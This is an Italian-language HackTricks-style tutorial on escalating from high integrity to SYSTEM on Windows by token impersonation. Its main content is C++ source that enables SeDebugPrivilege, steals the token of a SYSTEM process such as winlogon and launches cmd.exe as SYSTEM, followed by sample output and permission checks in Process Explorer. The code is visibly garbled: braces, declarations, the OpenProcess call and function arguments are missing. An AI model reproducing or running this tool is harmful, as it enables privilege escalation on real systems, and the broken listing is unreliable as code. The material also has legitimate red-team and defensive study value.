
7.4 KiB

SeImpersonate da High a System

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:


Il seguente codice da qui. Consente di indicare un ID processo come argomento e verrà eseguito un CMD come l'utente del processo indicato.
Eseguendo in un processo di alta integrità è possibile indicare il PID di un processo in esecuzione come Sistema (come winlogon, wininit) ed eseguire un cmd.exe come sistema.

impersonateuser.exe 1234

{% code title="impersonateuser.cpp" %}

// From https://securitytimes.medium.com/understanding-and-abusing-access-tokens-part-ii-b9069f432962

#include <windows.h>
#include <iostream>
#include <Lmcons.h>
BOOL SetPrivilege(
HANDLE hToken,          // access token handle
LPCTSTR lpszPrivilege,  // name of privilege to enable/disable
BOOL bEnablePrivilege   // to enable or disable privilege
LUID luid;
if (!LookupPrivilegeValue(
NULL,            // lookup privilege on local system
lpszPrivilege,   // privilege to lookup
&luid))        // receives LUID of privilege
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
printf("[-] The token does not have the specified privilege. \n");
return FALSE;
return TRUE;
std::string get_username()
TCHAR username[UNLEN + 1];
DWORD username_len = UNLEN + 1;
GetUserName(username, &username_len);
std::wstring username_w(username);
std::string username_s(username_w.begin(), username_w.end());
return username_s;
int main(int argc, char** argv) {
// Print whoami to compare to thread later
printf("[+] Current user is: %s\n", (get_username()).c_str());
// Grab PID from command line argument
char* pid_c = argv[1];
// Initialize variables and structures
HANDLE tokenHandle = NULL;
HANDLE duplicateTokenHandle = NULL;
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
// Add SE debug privilege
HANDLE currentTokenHandle = NULL;
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
printf("[+] SeDebugPrivilege enabled!\n");
// Call OpenProcess(), print return code and error code
if (GetLastError() == NULL)
printf("[+] OpenProcess() success!\n");
printf("[-] OpenProcess() Return Code: %i\n", processHandle);
printf("[-] OpenProcess() Error: %i\n", GetLastError());
// Call OpenProcessToken(), print return code and error code
BOOL getToken = OpenProcessToken(processHandle, MAXIMUM_ALLOWED, &tokenHandle);
if (GetLastError() == NULL)
printf("[+] OpenProcessToken() success!\n");
printf("[-] OpenProcessToken() Return Code: %i\n", getToken);
printf("[-] OpenProcessToken() Error: %i\n", GetLastError());
// Impersonate user in a thread
BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
if (GetLastError() == NULL)
printf("[+] ImpersonatedLoggedOnUser() success!\n");
printf("[+] Current user is: %s\n", (get_username()).c_str());
printf("[+] Reverting thread to original user context\n");
printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
// Call DuplicateTokenEx(), print return code and error code
BOOL duplicateToken = DuplicateTokenEx(tokenHandle, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
if (GetLastError() == NULL)
printf("[+] DuplicateTokenEx() success!\n");
printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken);
printf("[-] DupicateTokenEx() Error: %i\n", GetLastError());
// Call CreateProcessWithTokenW(), print return code and error code
BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);
if (GetLastError() == NULL)
printf("[+] Process spawned!\n");
printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess);
printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError());
return 0;

{% endcode %}


In alcune occasioni potresti provare a impersonare System e non funzionerà mostrando un output come il seguente:

[+] OpenProcess() success!
[+] OpenProcessToken() success!
[-] ImpersonatedLoggedOnUser() Return Code: 1
[-] ImpersonatedLoggedOnUser() Error: 5
[-] DuplicateTokenEx() Return Code: 0
[-] DupicateTokenEx() Error: 5
[-] CreateProcessWithTokenW Return Code: 0
[-] CreateProcessWithTokenW Error: 1326

Questo significa che anche se stai eseguendo con un livello di integrità elevato non hai abbastanza autorizzazioni.
Verifichiamo le autorizzazioni attuali dell'amministratore sui processi svchost.exe con processes explorer (o puoi anche usare process hacker):

  1. Seleziona un processo di svchost.exe
  2. Fai clic destro --> Proprietà
  3. All'interno della scheda "Sicurezza" fai clic in basso a destra sul pulsante "Autorizzazioni"
  4. Fai clic su "Avanzate"
  5. Seleziona "Amministratori" e fai clic su "Modifica"
  6. Fai clic su "Mostra autorizzazioni avanzate"

L'immagine precedente contiene tutti i privilegi che gli "Amministratori" hanno sul processo selezionato (come puoi vedere nel caso di svchost.exe hanno solo privilegi di "Query")

Guarda i privilegi che gli "Amministratori" hanno su winlogon.exe:

All'interno di quel processo gli "Amministratori" possono "Leggere la memoria" e "Leggere le autorizzazioni" che probabilmente consente agli Amministratori di impersonare il token utilizzato da questo processo.